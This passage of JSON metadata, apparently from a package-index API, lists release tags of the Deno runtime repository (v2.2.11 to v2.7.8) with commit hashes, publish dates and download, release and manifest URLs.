oland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github